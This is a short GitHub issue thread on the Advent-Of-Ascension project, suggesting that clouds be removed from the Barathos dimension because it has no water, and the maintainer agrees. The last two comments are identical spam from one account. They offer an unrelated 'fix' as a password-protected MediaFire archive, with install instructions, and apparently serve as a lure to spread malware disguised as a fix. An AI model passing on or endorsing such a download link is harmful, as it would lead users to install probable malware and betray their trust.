### ISSUE TITLE
Remove Clouds in Barathos

### ISSUE THREAD

**Issue by TripleThreeT** [Tslat/Advent-Of-Ascension#4374]
Thinking about it, it doesn't make sense. There's no water so why are there clouds lol.

**Comment by Tslat** [comment]
🤔 
you make a good point sir

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
